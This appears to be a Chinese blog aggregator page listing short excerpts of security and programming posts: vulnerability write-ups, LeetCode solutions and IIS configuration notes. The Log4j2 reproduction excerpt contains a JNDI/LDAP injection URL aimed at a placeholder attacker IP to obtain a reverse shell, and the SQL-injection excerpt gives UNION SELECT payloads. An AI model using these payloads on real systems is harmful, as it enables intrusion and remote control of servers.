漏洞iis 7.5
堆块chunk介绍及unlink漏洞利用原理
堆块chunk介绍及unlink漏洞利用原理 chunk结构 当进程动态分配内存时,系统会在堆中创建一个chunk(堆块)。chunk包含chunk头和chunk体两部分 chunk头中有两个字段: prev_size:前一个chunk的size,前指的之前分配的内存,也就是低地址相邻的chunk ......
小皮1-click漏洞的代码审计学习笔记
漏洞起源于前段时间比较火的小皮 1-click 漏洞,用户名登录处缺少过滤,导致可以直接构造恶意 payload 实现存储型 XSS ,结合小皮本身所具有的计划任务,XSS + CSRF 实现了 RCE 。 因为用户名登录处缺少过滤,所以可以尝试 SQL 漏洞。 ......
golang CVE-2016-2183漏洞,https需要添加tls设置加密算法CipherSuites白名单,将弱加密算法DES和3DES去掉。
golang CVE-2016-2183漏洞,https需要添加tls设置加密算法白名单,将弱加密算法DES和3DES去掉。 服务端样例代码 package main import ( "crypto/tls" "fmt" "net/http" ) func handler(writer http. ......
文件包含漏洞
文件包含渗透 1.项目实验环境 2.原理及危害 文件包含漏洞: 即File Inclusion ,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数( include() , require()和include_once() ,requi ......
文件上传漏洞
文件上传漏洞原理 1、文件上传( File Upload )是大部分web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、 图片、视频等, Web应用收集之后放入后台存储,需要的时候再调用出来返回 3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并 ......
.net6的IIS发布部署
1.打开控制面板,打开程序 2.点击启动或关闭windows功能 3.在其中选择要设置的IIS功能 4.重启IIS服务 5.发布项目 6.在开始菜单搜索IIS,点击IIS管理器 7.右击网站,点击添加网站,进行网站配置 8.可以自定义网站名称(可以是项目名,方便查询),物理路径就是项目发布生成的文件 ......
【贪心】LeetCode 45. 跳跃游戏 II
题目链接 45. 跳跃游戏 II 思路 如果某一个作为 起跳点 的格子可以跳跃的距离是 3,那么表示后面 3 个格子都可以作为 起跳点。 11. 可以对每一个能作为 起跳点 的格子都尝试跳一次,把 能跳到最远的距离 不断更新。 如果从这个 起跳点 起跳叫做第 1 次 跳跃,那么从后面 3 个格子起跳 ......
day18| 513.找树左下角的值;112.路径总和;113.路径总和II;106;105
513.找树左下角的值 深度优先搜索 class Solution: def findBottomLeftValue(self, root: Optional[TreeNode]) -> int: curVal = curHeight = 0 def dfs(node: Optional[TreeN ......
04_靶机Kioptrix1.2:CMS漏洞利用,使用ht编辑器修改sudoers文件提权,mysql查询
发现主机后进行目录扫描,发现登录口标注了CMS的版本,查看该类型CMS有没有漏洞,针对漏洞去github搜索脚本,拿到脚本后运行得到靶机的初级Shell,根据靶机内的文件内容指示使用ht编辑器,利用编辑器去修改用户的权限然后提权,拿到root权限结束 ......
寒假每日一题——牛为什么过马路 II
牛为什么过马路 问题描述 农夫约翰的农场的布局十分奇特,一条大型的环形道路将奶牛吃草的田地围了起来。 每天早晨,奶牛们穿过这条道路,进入到田地吃草;每天晚上,奶牛们穿过这条道路,离开田地,返回牛棚休息。 众所周知,奶牛是有习性的动物,每头奶牛每天通过道路的方式都相同。 每头奶牛每天固定的从道路的某一 ......
IIS Log(IIS日志)
IIS Log Window系统日志 任务管理器 IIS Log IIS Log开启 选择字段 添加自定义字段 日志分析 分析工具 Excel HttpLogBrowser Log Parser Log Parser Studio ......
代码随想录day 32● 122.买卖股票的最佳时机II ● 55. 跳跃游戏 ● 45.跳跃游戏II
122.买卖股票的最佳时机II 给定一个数组,它的第 i 个元素是一支给定股票第 i 天的价格。 设计一个算法来计算你所能获取的最大利润。你可以尽可能地完成更多的交易(多次买卖一支股票)。 注意:你不能同时参与多笔交易(你必须在再次购买前出售掉之前的股票)。 示例 1: 输入: [7,1,5,3,6 ......
day32 打卡122.买卖股票的最佳时机II 55. 跳跃游戏 45.跳跃游戏II
day32 打卡122.买卖股票的最佳时机II 55. 跳跃游戏 45.跳跃游戏II 122.买卖股票的最佳时机II 122题目链接 class Solution { public int maxProfit(int[] prices) { int result = 0 ; for (int i = ......
最长上升子序列 II
最长上升子序列 II 题目描述 给定一个长度为 N 的数列,求数值严格单调递增的子序列的长度最长是多少。 输入格式 第一行包含整数 N。 第二行包含 N 个整数,表示完整序列。 输出格式 输出一个整数,表示最大长度。 数据范围 1 ≤ N ≤100000 -10^9 ≤ 数列中的数 ≤ 10^9 输 ......
树(层序遍历):剑指 Offer 32 - II. 从上到下打印二叉树 II
题目描述: 从上到下按层打印二叉树,同一层的节点按从左到右的顺序打印,每一层打印到一行。 例如:给定二叉树: [3,9,20,null,null,15,7], 3 / \ 9 20 / \ 15 7 返回其层次遍历结果: [ [3], [9,20], [15,7]] 提示: 节点总数 <= 1000 ......
day8| 344.反转字符串;541.反转字符串II;剑指offer 05.替换空格;151.翻转字符串里的单词;剑指offer 58.左旋转字符串
344.反转字符串 题目简述: 编写一个函数,其作用是将输入的字符串反转过来。输入字符串以字符数组s的形式给出。不要给另外的数组分配额外的空间,你必须原地修改输入数组,使用O(1)的额外空间解决这一问题。 解题思路: 没什么好说的,直接双指针 代码如下: class Solution: def re ......
log4j2漏洞复现
【1】漏洞原理:Log4j2默认支持解析ldap/rmi协议(只要打印的日志中包括ldap/rmi协议 即可)【2】复现:(1)启动靶场环境:(2)反弹shell:http://靶机ip:8983/solr/admin/cores?action=${jndi:ldap://攻击机ip:1389/Ba ......
《渗透测试》WEB攻防-通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2等 2022 Day26
#Oracle 参考:https://www.cnblogs.com/peterpan0707007/p/8242119.html 测回显:and 1=2 union select '1','2' from dual 爆库:and 1=2 union select '1',(select table ......
82. 删除排序链表中的重复元素 II
class Solution { public: ListNode* deleteDuplicates(ListNode* head) { ListNode* dummy=new ListNode(-1,nullptr); if(!head||!head->next) return head; Li ......
SignalR, No Connection with that ID,IIS
在 IIS 上启用 Websocket 在 Windows Server 2012 或更高版本上启用对 WebSocket 协议的支持: 备注 使用 IIS Express 时无需执行这些步骤 通过“管理”菜单或“服务器管理器”中的链接使用“添加角色和功能”向导。 选择“基于角色或基于功能的安装”。 ......
Docker API 未授权访问漏洞
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。 ......
数仓安全测试之SSRF漏洞
摘要:SSRF (Server-Side Request Forgery,服务器端请求伪造)是指由攻击者构造请求,然后利用服务器的漏洞以服务端的身份向内网发送请求对内网发起攻击。 本文分享自华为云社区《GaussDB(DWS)安全测试之SSRF漏洞》,作者: ACBD。 1. 什么是SSRF漏洞 S ......
iis 防止头部攻击 webconfig配置
<rule name="防止头部攻击" patternSyntax="ExactMatch" stopProcessing="true"> <match url="*" negate="true" /> <conditions> <add input="{HTTP_HOST}" pattern="域 ......
IIS webconfig http重定向https配置
<rule name="redirect to HTTPS" stopProcessing="true"> <match url="(.*)" /> <conditions> <add input="{HTTP_HOST}" pattern="localhost" negate="true" /> ......
day29 打卡491.递增子序列 46.全排列 47.全排列 II
day29 打卡491.递增子序列 46.全排列 47.全排列 II 491.递增子序列 491题目链接 class Solution { List<List<Integer>> result = new ArrayList<>(); LinkedList<Integer> path = new L ......
代码随想录day 28 491. 递增子序列 | * 46.全排列 | 47.全排列 II
给定一个整型数组, 你的任务是找到所有该数组的递增子序列,递增子序列的长度至少是2。 示例: 输入: [4, 6, 7, 7] 输出: [[4, 6], [4, 7], [4, 6, 7], [4, 6, 7, 7], [6, 7], [6, 7, 7], [7,7], [4,7,7]] 说明: 给 ......
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814)
PfSense pfBlockerNG 未授权RCE漏洞(CVE-2022-31814) 概述 PfSense系统的插件pfBlockerNG引起的未授权RCE漏洞 pfSense是一个基于FreeBSD操作系统开发的防火墙和路由器软件 FreeBSD 是一种类UNIX操作系统 pfBlockerN ......
IIS添加/更新证书(过期续费更新)
1.在https://www.myssl.cn/tools/create-csr.html生成密钥文件(key)和证书文件CSR,保存起来; 2.复制CSR文件内容到godaddy重新生成证书秘钥,提交全部,等待证书更新(正常一分钟内); 3.下载IIS证书,将证书以及上面的CSR\KEY文件传到服 ......
【永嘉原厂技术支持】超低功耗LCD液晶段码屏显示驱动IC-VKL076 SSOP28,19*4 76点阵,超低工作电流约7.5微安,适用水电表/温湿度计/温控器/传感器等
VKL076概述: VKL076是一个点阵式存储映射的LCD驱动器,可支持最大76点(19SEGx4COM)的LCD屏。单片机可通过I2C接口配置显示参数和读写显示数据,可配置4种功耗模式,也可通过关显示和关振荡器进入省电模式。其高抗干扰,低功耗的特性适用于水电气表以及工控仪表类产品。QT890 功 ......